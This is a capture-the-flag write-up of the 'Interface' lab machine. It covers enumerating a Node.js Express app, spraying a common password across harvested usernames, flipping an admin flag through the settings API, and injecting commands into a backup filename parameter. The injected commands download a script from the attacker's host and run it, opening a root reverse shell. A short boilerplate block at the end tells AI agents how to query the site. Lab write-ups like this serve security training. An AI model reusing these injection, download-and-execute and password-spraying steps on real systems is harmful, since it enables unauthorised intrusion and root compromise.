# 2 :80

```
http://192.168.71.106/
Login Page | node.js express framework
| contains top Users

# tried admin:admin
| popup -> Authentication Error, Login Failed

$ gobuster dir -u http://192.168.71.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,html,txt -t 90
===============================================================
/main.js              (Status: 200) [Size: 47602]
/index.html           (Status: 200) [Size: 703]
/vendor.js            (Status: 200) [Size: 3515713]
/styles.js            (Status: 200) [Size: 171811]
/runtime.js           (Status: 200) [Size: 6299]

# clear cache, capture in Burp 
# requests to /api/users, /api/settings

$ curl http://192.168.71.106/api/users > users.json
# cleaning
| remove ','
| replace "" with new line
$ cat users.json| sed 's/,//g' | sed 's/""/\n/g' > users
# fix first and last line to remove '[' and ']'

# trying to brute force with users:'password'
$ while read line; do curl -s -X POST -H 'Content-Type: application/json' --data-binary "{\"username\":\"$line\",\"password\":\"password\"}" http://192.168.71.106/login | grep -v Unauthorized && echo $line; done < users
OK
dev-acct

# got creds dev-acct:password
# logging in 
# response
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/plain; charset=utf-8
Content-Length: 2
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
Set-Cookie: connect.sid=s%3Ak2KqzG6W0nOILbKK7spk6lK-1gyqL50-.2nn2tYlXXHp%2FVzl1puzVIRPQy1rGs%2BQwCJcRcL4Mm5E; Path=/; HttpOnly
Date: Fri, 08 Oct 2021 20:24:31 GMT
Connection: close

OK

# burp made a new request
GET /api/settings HTTP/1.1
Host: 192.168.71.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.71.106/
Cookie: connect.sid=s%3Ak2KqzG6W0nOILbKK7spk6lK-1gyqL50-.2nn2tYlXXHp%2FVzl1puzVIRPQy1rGs%2BQwCJcRcL4Mm5E
# response
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 49
ETag: W/"31-EAIySo5UXJkhTs42wlD84mCNbPQ"
Date: Fri, 08 Oct 2021 20:24:32 GMT
Connection: close

{"color-theme":"light","lang":"en","admin":false}

# changing to Dark Theme from web sends the request
POST /api/settings HTTP/1.1
Host: 192.168.71.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 22
Origin: http://192.168.71.106
DNT: 1
Connection: close
Referer: http://192.168.71.106/
Cookie: connect.sid=s%3Ak2KqzG6W0nOILbKK7spk6lK-1gyqL50-.2nn2tYlXXHp%2FVzl1puzVIRPQy1rGs%2BQwCJcRcL4Mm5E

{"color-theme":"dark"

# maybe we can set admin:true
POST /api/settings HTTP/1.1
Host: 192.168.71.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 16
Origin: http://192.168.71.106
DNT: 1
Connection: close
Referer: http://192.168.71.106/
Cookie: connect.sid=s%3Ak2KqzG6W0nOILbKK7spk6lK-1gyqL50-.2nn2tYlXXHp%2FVzl1puzVIRPQy1rGs%2BQwCJcRcL4Mm5E

{"admin":"true"}
# response
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/plain; charset=utf-8
Content-Length: 2
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
Date: Fri, 08 Oct 2021 20:26:55 GMT
Connection: close

OK

# refreshing the page shows as BackupLogs submit button
# creates a log file in /var/log/app/logfile-<USER-ENTERED>.gz

Can create backup files, but don't understnad how to download it
| looking at f12 > Debugger > Webpack > src > app > log-bakcup > blog-backup.componenet.ts

let result = await this.http.get(`/api/backup?filename=${f.value.filename}`,

# call is being made to /api/backup?filename=<>
# tried searching for where the file is uploaded, cant find it

# trying commnad injection

GET /api/backup?filename=; wget 192.168.49.71/kashz.sh -O /tmp/kashz; HTTP/1.1
GET /api/backup?filename=chmod +x /tmp/kashz; HTTP/1.1
GET /api/backup?filename=;bash /tmp/kashz; HTTP/1.1

$ nc -lvnp 6969                                                                                                  1 ⨯
listening on [any] 6969 ...
connect to [192.168.49.71] from (UNKNOWN) [192.168.71.106] 58418
bash: cannot set terminal process group (422): Inappropriate ioctl for device
bash: no job control in this shell

root@interface:/var/www/app/dist# whoami;id;hostname
whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
interface

root@interface:/var/www# cat /etc/passwd | grep sh
cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
justin:x:1000:1000:justin,,,:/home/justin:/bin/bash
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/proving-grounds-writeups/pg-boxes/interface/2-80.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.